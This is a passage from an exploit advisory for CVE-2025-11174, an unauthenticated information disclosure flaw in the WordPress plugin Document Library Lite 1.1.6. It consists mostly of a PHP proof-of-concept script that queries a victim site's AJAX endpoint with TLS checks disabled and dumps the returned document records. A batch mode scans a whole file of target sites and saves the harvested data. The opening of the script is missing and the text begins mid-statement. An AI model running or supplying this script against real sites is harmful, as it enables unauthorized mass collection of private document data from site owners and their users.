============================================================================================================================================= | # Title : WordPress Document Library Lite 1.1.6 Information Disclosure | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : https://wordpress.org/plugins/document-library-lite/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/211137/ & CVE-2025-11174 [+] Summary : The WordPress plugin “Document Library Lite” fails to restrict access to internal AJAX API endpoint allowing unauthenticated attackers to fetch document records exposing sensitive metadata. [+] POC : * Usage: php poc.php https://victim.com php poc.php https://victim.com output.json $u, CURLOPT_POST=>true, CURLOPT_POSTFIELDS=>$p, CURLOPT_HTTPHEADER=>$h, CURLOPT_RETURNTRANSFER=>true, CURLOPT_TIMEOUT=>10, CURLOPT_FOLLOWLOCATION=>true, CURLOPT_SSL_VERIFYPEER=>false ]); $r=curl_exec($c); $s=curl_getinfo($c,CURLINFO_HTTP_CODE); $e=curl_error($c); curl_close($c); echo Colors::G."[+] HTTP: ".Colors::N.$s.PHP_EOL.PHP_EOL; if($e){ echo Colors::R."[!] CURL ERROR: $e".Colors::N.PHP_EOL; return ["vuln"=>false]; } if($s!=200){ echo Colors::Y."[!] Unexpected status".Colors::N.PHP_EOL; return ["vuln"=>false]; } $j=json_decode($r,true); if(json_last_error()!==JSON_ERROR_NONE){ echo Colors::G."[+] No JSON returned — not vulnerable".Colors::N.PHP_EOL; return ["vuln"=>false]; } if(isset($j["data"]) || isset($j["recordsTotal"])){ echo Colors::R."[!!!] VULNERABLE".Colors::N.PHP_EOL.PHP_EOL; echo Colors::G."[+] Retrieved Data:".Colors::N.PHP_EOL; echo json_encode($j,JSON_PRETTY_PRINT).PHP_EOL; return ["vuln"=>true,"data"=>$j]; } echo Colors::G."[+] Not vulnerable".Colors::N.PHP_EOL; if($v){ echo Colors::Y."[Verbose] Data:".Colors::N.PHP_EOL; echo json_encode($j,JSON_PRETTY_PRINT).PHP_EOL; } return ["vuln"=>false,"data"=>$j]; } function isPCNTL(){ return function_exists("pcntl_signal") && function_exists("pcntl_async_signals"); } function main(){ global $argv; $opts=getopt("vho:",["verbose","help","output:","batch","no-banner"]); if(!isset($opts["no-banner"])) banner(); if(isset($opts["h"])||isset($opts["help"])){ echo "Usage: php ".basename($argv[0])." [OPTIONS] TARGET\n\n"; exit; } $verbose=(isset($opts["v"])||isset($opts["verbose"])); // Last standalone argument (target) $args=$argv; array_shift($args); foreach($args as $a){ if($a[0]!="-"){$target=$a;break;} } if(empty($target)){ echo Colors::R."[!] ERROR: No Target Provided".Colors::N.PHP_EOL; exit(1); } if(isset($opts["batch"])){ $file=$target; if(!file_exists($file)){ echo Colors::R."[!] ERROR: Batch file not found: $file".Colors::N.PHP_EOL; exit(1); } $list=file($file,FILE_IGNORE_NEW_LINES|FILE_SKIP_EMPTY_LINES); echo Colors::G."[+] Loaded ".count($list)." targets".Colors::N.PHP_EOL.PHP_EOL; $res=[]; foreach($list as $x){ echo Colors::C."[~] Testing $x".Colors::N.PHP_EOL; $r=poc($x,$verbose); $r["target"]=$x; $res[]=$r; echo PHP_EOL; } if(isset($opts["o"])||isset($opts["output"])){ $o=$opts["o"]??$opts["output"]; file_put_contents($o,json_encode($res,JSON_PRETTY_PRINT)); echo Colors::G."[+] Saved to: $o".Colors::N.PHP_EOL; } exit; } $r=poc($target,$verbose); if(isset($opts["o"])||isset($opts["output"])){ $o=$opts["o"]??$opts["output"]; file_put_contents($o,json_encode($r,JSON_PRETTY_PRINT)); echo Colors::G."[+] Saved to: $o".Colors::N.PHP_EOL; } exit($r["vuln"]?0:1); } if(isPCNTL()){ pcntl_async_signals(true); pcntl_signal(SIGINT,function(){ echo PHP_EOL.Colors::Y."[!] Interrupted".Colors::N.PHP_EOL; exit(130); }); } main(); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================